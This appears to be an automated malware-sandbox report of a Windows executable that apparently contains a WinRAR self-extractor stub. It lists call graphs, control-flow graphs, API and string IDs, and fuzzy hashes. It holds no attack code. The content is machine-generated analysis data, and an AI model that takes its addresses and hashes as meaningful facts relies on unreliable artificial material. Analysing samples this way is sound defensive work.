7ff6063a5c30 _handle_error 8 API calls 22890->22893 22891 7ff6063972e1 22894 7ff6063953bc 120 API calls 22891->22894 22892 7ff60639502c 120 API calls 22899 7ff60639748e 22892->22899 22895 7ff60639754c 22893->22895 22894->22898 22895->22835 22903 7ff606397f5c 22895->22903 22896 7ff6063953bc 120 API calls 22896->22898 22897->22890 22897->22892 22898->22890 22898->22896 22898->22897 22899->22890 22916 7ff606396fcc 22899->22916 22901->22891 22902->22888 22904 7ff6063977e7 22903->22904 22905 7ff606397f70 22903->22905 22904->22835 22904->22846 22905->22904 22927 7ff606394a98 22905->22927 22923 7ff606397cc8 22916->22923 22925 7ff606397d1d memcpy_s 22923->22925 22924 7ff60639700f 22925->22924 22926 7ff606384c40 101 API calls 22925->22926 22926->22925 22928 7ff606394ad2 22927->22928 22941 7ff606394acb 22927->22941 22929 7ff606394b10 22928->22929 22931 7ff606394b58 22928->22931 22935 7ff606394adf 22928->22935 22935->22929 22935->22941 22958->22569 22959->22575 22960->22578 22961->22603 22974 7ff6063a4976 14 API calls _com_raise_error 23011 7ff6063947f0 23012 7ff606388e0c 33 API calls 23011->23012 23013 7ff606394835 23012->23013 23014 7ff606386288 55 API calls 23013->23014 23015 7ff606394866 23014->23015 23016 7ff606394909 23015->23016 23017 7ff606394936 23015->23017 23020 7ff606394931 23015->23020 23018 7ff6063a5c30 _handle_error 8 API calls 23016->23018 23019 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 23017->23019 23021 7ff60639491c 23018->23021 23022 7ff60639493c 23019->23022 23023 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 23020->23023 23023->23017 23031 7ff6063832f0 23039 7ff606383327 23031->23039 23032 7ff60638335b 23033 7ff6063a5c30 _handle_error 8 API calls 23032->23033 23034 7ff6063833dd 23033->23034 23036 7ff6063833c3 23038 7ff606381b70 31 API calls 23036->23038 23038->23032 23039->23032 23039->23036 23040 7ff6063833ee 23039->23040 23044 7ff606386858 23039->23044 23067 7ff60638dacc 23039->23067 23041 7ff6063833ff 23040->23041 23071 7ff60638d9b4 CompareStringW 23040->23071 23041->23036 23043 7ff606381c80 33 API calls 23041->23043 23043->23036 23047 7ff606386898 23044->23047 23045 7ff606386962 23072 7ff606386ae8 23045->23072 23047->23045 23051 7ff6063868d6 __vcrt_FlsAlloc 23047->23051 23079 7ff606390ad0 CompareStringW 23047->23079 23048 7ff6063a5c30 _handle_error 8 API calls 23050 7ff606386ac7 23048->23050 23050->23039 23053 7ff6063868fd 23051->23053 23055 7ff606386946 __vcrt_FlsAlloc 23051->23055 23080 7ff606390ad0 CompareStringW 23051->23080 23053->23048 23054 7ff606386a85 23054->23053 23082 7ff60638d9d0 CompareStringW 23054->23082 23055->23045 23055->23053 23057 7ff6063812bc 33 API calls 23055->23057 23058 7ff6063869fd 23055->23058 23063 7ff606386a6a __vcrt_FlsAlloc 23055->23063 23059 7ff6063869ea 23057->23059 23060 7ff606386a4d 23058->23060 23062 7ff606386adf 23058->23062 23061 7ff60638885c 8 API calls 23059->23061 23060->23053 23060->23063 23081 7ff606390ad0 CompareStringW 23060->23081 23061->23058 23065 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 23062->23065 23063->23045 23063->23053 23063->23054 23066 7ff606386ae4 23065->23066 23068 7ff60638dadf 23067->23068 23069 7ff606381c80 33 API calls 23068->23069 23070 7ff60638dafd 23068->23070 23069->23070 23070->23039 23071->23041 23076 7ff606386b14 23072->23076 23073 7ff606386c1d 23074 7ff606386ae8 CompareStringW 23073->23074 23075 7ff606386bc1 23073->23075 23074->23073 23075->23053 23076->23073 23076->23075 23077 7ff606386c02 23076->23077 23077->23075 23083 7ff60638d9d0 CompareStringW 23077->23083 23079->23051 23080->23055 23081->23063 23082->23053 23083->23075

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00007FF60638DC4C Relevance: 154.6, APIs: 22, Strings: 66, Instructions: 610libraryloaderCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 0 7ff60638dc4c-7ff60638dcb0 call 7ff6063813c4 GetSystemDirectoryW 3 7ff60638dcb2-7ff60638dcb4 0->3 4 7ff60638dcb9-7ff60638dd34 call 7ff6063aaf0c call 7ff6063812bc call 7ff6063aaf0c call 7ff6063812bc call 7ff6063888f8 0->4 5 7ff60638de19-7ff60638de20 3->5 31 7ff60638dd36-7ff60638dd48 4->31 32 7ff60638dd68-7ff60638dd81 4->32 8 7ff60638de51-7ff60638de78 call 7ff6063a5c30 5->8 9 7ff60638de22-7ff60638de35 5->9 12 7ff60638de37-7ff60638de4a 9->12 13 7ff60638de4c call 7ff6063a5b1c 9->13 12->13 14 7ff60638de79-7ff60638de7e call 7ff6063aae94 12->14 13->8 22 7ff60638de7f-7ff60638de84 call 7ff6063aae94 14->22 28 7ff60638de85-7ff60638de8a call 7ff6063aae94 22->28 43 7ff60638de8b-7ff60638dee8 call 7ff6063aae94 call 7ff6063a5c90 GetModuleHandleW 28->43 36 7ff60638dd63 call 7ff6063a5b1c 31->36 37 7ff60638dd4a-7ff60638dd5d 31->37 33 7ff60638dd83-7ff60638dd95 32->33 34 7ff60638ddb5-7ff60638ddd4 LoadLibraryExW 32->34 39 7ff60638ddb0 call 7ff6063a5b1c 33->39 40 7ff60638dd97-7ff60638ddaa 33->40 41 7ff60638ddd6-7ff60638dde8 34->41 42 7ff60638de08-7ff60638de15 34->42 36->32 37->22 37->36 39->34 40->28 40->39 45 7ff60638de03 call 7ff6063a5b1c 41->45 46 7ff60638ddea-7ff60638ddfd 41->46 42->5 53 7ff60638df3f-7ff60638e269 43->53 54 7ff60638deea-7ff60638defd GetProcAddress 43->54 45->42 46->43 46->45 57 7ff60638e26f-7ff60638e278 call 7ff6063aec3c 53->57 58 7ff60638e3c7-7ff60638e3e5 call 7ff606387c10 call 7ff606388b28 53->58 55 7ff60638deff-7ff60638df0e 54->55 56 7ff60638df17-7ff60638df2a GetProcAddress 54->56 55->56 56->53 60 7ff60638df2c-7ff60638df3c 56->60 57->58 66 7ff60638e27e-7ff60638e2c1 call 7ff606387c10 CreateFileW 57->66 70 7ff60638e3e9-7ff60638e3f3 call 7ff606386768 58->70 60->53 71 7ff60638e3b4-7ff60638e3c2 CloseHandle call 7ff606381b70 66->71 72 7ff60638e2c7-7ff60638e2da SetFilePointer 66->72 78 7ff60638e3f5-7ff60638e400 call 7ff60638dc4c 70->78 79 7ff60638e428-7ff60638e470 call 7ff6063aaf0c call 7ff6063812bc call 7ff606388dc4 call 7ff606381b70 call 7ff606385890 70->79 71->58 72->71 74 7ff60638e2e0-7ff60638e302 ReadFile 72->74 74->71 77 7ff60638e308-7ff60638e316 74->77 81 7ff60638e6c4-7ff60638e6dc call 7ff6063a5df4 call 7ff606390100 call 7ff606390108 77->81 82 7ff60638e31c-7ff60638e370 call 7ff6063aaf0c call 7ff6063812bc 77->82 78->79 88 7ff60638e402-7ff60638e426 CompareStringW 78->88 130 7ff60638e475-7ff60638e478 79->130 118 7ff60638e6de-7ff60638e6ea call 7ff606383b84 81->118 119 7ff60638e6ef-7ff60638e6f6 81->119 102 7ff60638e387-7ff60638e39d call 7ff60638cf98 82->102 88->79 92 7ff60638e481-7ff60638e48a 88->92 92->70 99 7ff60638e490 92->99 103 7ff60638e495-7ff60638e498 99->103 121 7ff60638e39f-7ff60638e3af call 7ff606381b70 * 2 102->121 122 7ff60638e372-7ff60638e382 call 7ff60638dc4c 102->122 104 7ff60638e503-7ff60638e506 103->104 105 7ff60638e49a-7ff60638e49d 103->105 109 7ff60638e686-7ff60638e6c3 call 7ff606381b70 * 2 call 7ff6063a5c30 104->109 110 7ff60638e50c-7ff60638e51f call 7ff606388be4 call 7ff606386768 104->110 111 7ff60638e4a1-7ff60638e4f1 call 7ff6063aaf0c call 7ff6063812bc call 7ff606388dc4 call 7ff606381b70 call 7ff606385890 105->111 143 7ff60638e525-7ff60638e5c5 call 7ff60638dc4c * 2 call 7ff60638aee0 call 7ff60638da04 call 7ff60638aee0 call 7ff60638db98 call 7ff60639c3e8 call 7ff6063819d0 110->143 144 7ff60638e5ca-7ff60638e617 call 7ff60638da04 AllocConsole 110->144 169 7ff60638e500 111->169 170 7ff60638e4f3-7ff60638e4fc 111->170 118->119 128 7ff60638e6f8-7ff60638e704 call 7ff606383b84 119->128 129 7ff60638e709-7ff60638e712 SetThreadExecutionState 119->129 121->71 122->102 128->129 137 7ff60638e492 130->137 138 7ff60638e47a 130->138 137->103 138->92 158 7ff60638e678-7ff60638e67f call 7ff6063819d0 ExitProcess 143->158 155 7ff60638e674 144->155 156 7ff60638e619-7ff60638e66e GetCurrentProcessId AttachConsole call 7ff60638e72c call 7ff60638e71c GetStdHandle WriteConsoleW Sleep FreeConsole 144->156 155->158 156->155 169->104 170->111 173 7ff60638e4fe 170->173 173->104
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$AddressProc$DirectoryHandleLibraryLoadModuleSystem
                                                                                                                                                                                                                                                        • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                                                                                                                                                                                        • API String ID: 751436351-2013832382
                                                                                                                                                                                                                                                        • Opcode ID: d64c9edb356a7913ecfea325c24345d8ce3223450e70cbc395deec6d173345af
                                                                                                                                                                                                                                                        • Instruction ID: 87a44e7c13794fb7f220d19cab1124b2690e05afceb023181999d5c890ba6443
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d64c9edb356a7913ecfea325c24345d8ce3223450e70cbc395deec6d173345af
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44626C32A09F8299EB199F60E8401E973A4FF44354F603236DA4D877A5EF7EE644C380
                                                                                                                                                                                                                                                        Function 00007FF60639ECE0 Relevance: 123.9, APIs: 60, Strings: 10, Instructions: 1421windowfilesleepCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Item$Message$_invalid_parameter_noinfo_noreturn$Send$DialogText$File$ErrorLast$CloseFindFocusLoadStringViewWindow$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmap
                                                                                                                                                                                                                                                        • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                                                                                                                                                                                                        • API String ID: 255727823-2702805183
                                                                                                                                                                                                                                                        • Opcode ID: 325886699d3e479aa83e354952696db83c0ec1c6632f992920f5d98df5c10264
                                                                                                                                                                                                                                                        • Instruction ID: 55a511d7344c1b0c427ed163e1fd0de5e4b966cb51fd7ba51f9979efcfe9f56a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 325886699d3e479aa83e354952696db83c0ec1c6632f992920f5d98df5c10264
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53D2F562A0878385EB28DB20E8442F96361EF85784F607136D94DC77E6EF7EE944C790
                                                                                                                                                                                                                                                        Function 00007FF6063A09D8 Relevance: 65.0, APIs: 26, Strings: 10, Instructions: 1963windowfileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$FileMessageMoveSend$DialogItemPathTemp
                                                                                                                                                                                                                                                        • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                                                                                                                                                                                        • API String ID: 3007431893-3916287355
                                                                                                                                                                                                                                                        • Opcode ID: 375db2e0d226c61e0c1990f26411cdcbd7c7140125762ff0400803d08f65cc38
                                                                                                                                                                                                                                                        • Instruction ID: 0acf3f8fd782a9c9fe1c79637c6c3555d321b016599c5a41381ece51a9e88e85
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 375db2e0d226c61e0c1990f26411cdcbd7c7140125762ff0400803d08f65cc38
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6013C232B04B8289EF18DF64D8402ED27B1FB40398F602536DA5D97AE9DF79D585D380
                                                                                                                                                                                                                                                        Function 00007FF6063A400C Relevance: 47.8, APIs: 22, Strings: 5, Instructions: 539filesleeptimeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 1527 7ff6063a400c-7ff6063a40e1 call 7ff60638de94 call 7ff606387a28 call 7ff60639d0a8 call 7ff6063a74c0 call 7ff60639d724 1538 7ff6063a40e3-7ff6063a40f8 1527->1538 1539 7ff6063a4118-7ff6063a413b 1527->1539 1540 7ff6063a4113 call 7ff6063a5b1c 1538->1540 1541 7ff6063a40fa-7ff6063a410d 1538->1541 1542 7ff6063a4172-7ff6063a4195 1539->1542 1543 7ff6063a413d-7ff6063a4152 1539->1543 1540->1539 1541->1540 1544 7ff6063a4695-7ff6063a469a call 7ff6063aae94 1541->1544 1548 7ff6063a4197-7ff6063a41ac 1542->1548 1549 7ff6063a41cc-7ff6063a41ef 1542->1549 1546 7ff6063a4154-7ff6063a4167 1543->1546 1547 7ff6063a416d call 7ff6063a5b1c 1543->1547 1563 7ff6063a469b-7ff6063a46c7 call 7ff6063aae94 1544->1563 1546->1544 1546->1547 1547->1542 1554 7ff6063a41ae-7ff6063a41c1 1548->1554 1555 7ff6063a41c7 call 7ff6063a5b1c 1548->1555 1550 7ff6063a41f1-7ff6063a4206 1549->1550 1551 7ff6063a4226-7ff6063a4232 GetCommandLineW 1549->1551 1557 7ff6063a4221 call 7ff6063a5b1c 1550->1557 1558 7ff6063a4208-7ff6063a421b 1550->1558 1560 7ff6063a43ff-7ff6063a4416 call 7ff606387c10 1551->1560 1561 7ff6063a4238-7ff6063a426f call 7ff6063aaf0c call 7ff6063812bc call 7ff6063a0620 1551->1561 1554->1544 1554->1555 1555->1549 1557->1551 1558->1544 1558->1557 1569 7ff6063a4441-7ff6063a459c call 7ff606381b70 SetEnvironmentVariableW GetLocalTime call 7ff6063861e8 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff60639eb64 call 7ff606389cac call 7ff60639a430 * 2 DialogBoxParamW call 7ff60639a524 * 2 1560->1569 1570 7ff6063a4418-7ff6063a443d call 7ff606381b70 call 7ff6063a6e10 1560->1570 1596 7ff6063a4271-7ff6063a4284 1561->1596 1597 7ff6063a42a4-7ff6063a42ab 1561->1597 1575 7ff6063a4712-7ff6063a4728 call 7ff60638bbf8 1563->1575 1576 7ff6063a46c9-7ff6063a46da 1563->1576 1687 7ff6063a459e Sleep 1569->1687 1688 7ff6063a45a4-7ff6063a45ab 1569->1688 1570->1569 1591 7ff6063a4775-7ff6063a477f 1575->1591 1592 7ff6063a472a-7ff6063a473d 1575->1592 1581 7ff6063a46f8-7ff6063a470b call 7ff6063a5b1c 1576->1581 1582 7ff6063a46dc-7ff6063a46ef 1576->1582 1581->1575 1587 7ff6063a46f5 1582->1587 1588 7ff6063a4964-7ff6063a49b0 call 7ff6063aae94 call 7ff6063a5390 1582->1588 1587->1581 1632 7ff6063a49b5-7ff6063a49eb 1588->1632 1603 7ff6063a4781-7ff6063a4794 1591->1603 1604 7ff6063a47cc-7ff6063a47d6 1591->1604 1601 7ff6063a473f-7ff6063a4752 1592->1601 1602 7ff6063a475b-7ff6063a476e call 7ff6063a5b1c 1592->1602 1607 7ff6063a429f call 7ff6063a5b1c 1596->1607 1608 7ff6063a4286-7ff6063a4299 1596->1608 1599 7ff6063a42b1-7ff6063a42cb OpenFileMappingW 1597->1599 1600 7ff6063a4393-7ff6063a43bd call 7ff6063aaf0c call 7ff6063812bc call 7ff6063a3810 1597->1600 1613 7ff6063a42d1-7ff6063a42f1 MapViewOfFile 1599->1613 1614 7ff6063a4388-7ff6063a4391 CloseHandle 1599->1614 1662 7ff6063a43c2-7ff6063a43ca 1600->1662 1601->1588 1615 7ff6063a4758 1601->1615 1602->1591 1617 7ff6063a47b2-7ff6063a47c5 call 7ff6063a5b1c 1603->1617 1618 7ff6063a4796-7ff6063a47a9 1603->1618 1609 7ff6063a4823-7ff6063a482d 1604->1609 1610 7ff6063a47d8-7ff6063a47eb 1604->1610 1607->1597 1608->1563 1608->1607 1625 7ff6063a482f-7ff6063a4842 1609->1625 1626 7ff6063a487a-7ff6063a4884 1609->1626 1621 7ff6063a4809-7ff6063a481c call 7ff6063a5b1c 1610->1621 1622 7ff6063a47ed-7ff6063a4800 1610->1622 1613->1614 1624 7ff6063a42f7-7ff6063a4327 UnmapViewOfFile MapViewOfFile 1613->1624 1614->1560 1615->1602 1617->1604 1618->1588 1628 7ff6063a47af 1618->1628 1621->1609 1622->1588 1633 7ff6063a4806 1622->1633 1624->1614 1636 7ff6063a4329-7ff6063a4382 call 7ff60639dd08 call 7ff6063a3810 call 7ff60638bd30 call 7ff60638be7c call 7ff60638beec UnmapViewOfFile 1624->1636 1637 7ff6063a4860-7ff6063a4873 call 7ff6063a5b1c 1625->1637 1638 7ff6063a4844-7ff6063a4857 1625->1638 1640 7ff6063a48d1-7ff6063a495e call 7ff606381b70 * 10 1626->1640 1641 7ff6063a4886-7ff6063a4899 1626->1641 1628->1617 1645 7ff6063a49ed 1632->1645 1633->1621 1636->1614 1637->1626 1638->1588 1650 7ff6063a485d 1638->1650 1640->1588 1643 7ff6063a48b7-7ff6063a48ca call 7ff6063a5b1c 1641->1643 1644 7ff6063a489b-7ff6063a48ae 1641->1644 1643->1640 1644->1588 1653 7ff6063a48b4 1644->1653 1645->1645 1650->1637 1653->1643 1662->1560 1666 7ff6063a43cc-7ff6063a43df 1662->1666 1670 7ff6063a43e1-7ff6063a43f4 1666->1670 1671 7ff6063a43fa call 7ff6063a5b1c 1666->1671 1670->1671 1675 7ff6063a468f-7ff6063a4694 call 7ff6063aae94 1670->1675 1671->1560 1675->1544 1687->1688 1692 7ff6063a45b2-7ff6063a45d5 call 7ff60638bc5c DeleteObject 1688->1692 1693 7ff6063a45ad call 7ff60639dac4 1688->1693 1701 7ff6063a45d7 DeleteObject 1692->1701 1702 7ff6063a45dd-7ff6063a45e4 1692->1702 1693->1692 1701->1702 1704 7ff6063a4600-7ff6063a4611 1702->1704 1705 7ff6063a45e6-7ff6063a45ed 1702->1705 1707 7ff6063a4613-7ff6063a461f call 7ff6063a3928 CloseHandle 1704->1707 1708 7ff6063a4625-7ff6063a4632 1704->1708 1705->1704 1706 7ff6063a45ef-7ff6063a45fb call 7ff606383ef4 1705->1706 1706->1704 1707->1708 1713 7ff6063a4634-7ff6063a4641 1708->1713 1714 7ff6063a4657-7ff6063a465c call 7ff60639d120 1708->1714 1717 7ff6063a4651-7ff6063a4653 1713->1717 1718 7ff6063a4643-7ff6063a464b 1713->1718 1723 7ff6063a4661-7ff6063a468e call 7ff6063a5c30 1714->1723 1717->1714 1722 7ff6063a4655 1717->1722 1718->1714 1721 7ff6063a464d-7ff6063a464f 1718->1721 1721->1714 1722->1714
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$EnvironmentHandleVariableView_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                                                                                                                                                                                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                                                                                                                                        • API String ID: 3767324925-3710569615
                                                                                                                                                                                                                                                        • Opcode ID: 672bf953df9b2c0ed6fd5d6135e2b8bbf1eb438a14cfe977ab9df65a1aaea397
                                                                                                                                                                                                                                                        • Instruction ID: f57872bc44283689c883aa8cff7e583e63313129078fbb76b0dc95dc3b6b84b6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 672bf953df9b2c0ed6fd5d6135e2b8bbf1eb438a14cfe977ab9df65a1aaea397
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5742D971A18B8285EF08DF24D8442BD63A1FF84B84F606235DA5D876E6EF7ED540D390
                                                                                                                                                                                                                                                        Function 00007FF60638A8AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
                                                                                                                                                                                                                                                        • String ID: $%s:$CAPTION
                                                                                                                                                                                                                                                        • API String ID: 2100155373-404845831
                                                                                                                                                                                                                                                        • Opcode ID: 37b82379b4c8609f857ddfdd2aaec8a8c1c03398c79129c67daa6eff71331f07
                                                                                                                                                                                                                                                        • Instruction ID: 23b026c56a59116c89c74e9783efd6402c33c5b566500fd5b59ff5a20da7fa03
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37b82379b4c8609f857ddfdd2aaec8a8c1c03398c79129c67daa6eff71331f07
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE910A36B186418BD71CCF29E8006A9A7A1FBC4784F506535EE4D87B98DF7EE805CB40
                                                                                                                                                                                                                                                        Function 00007FF60639C260 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 101memorywindowCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
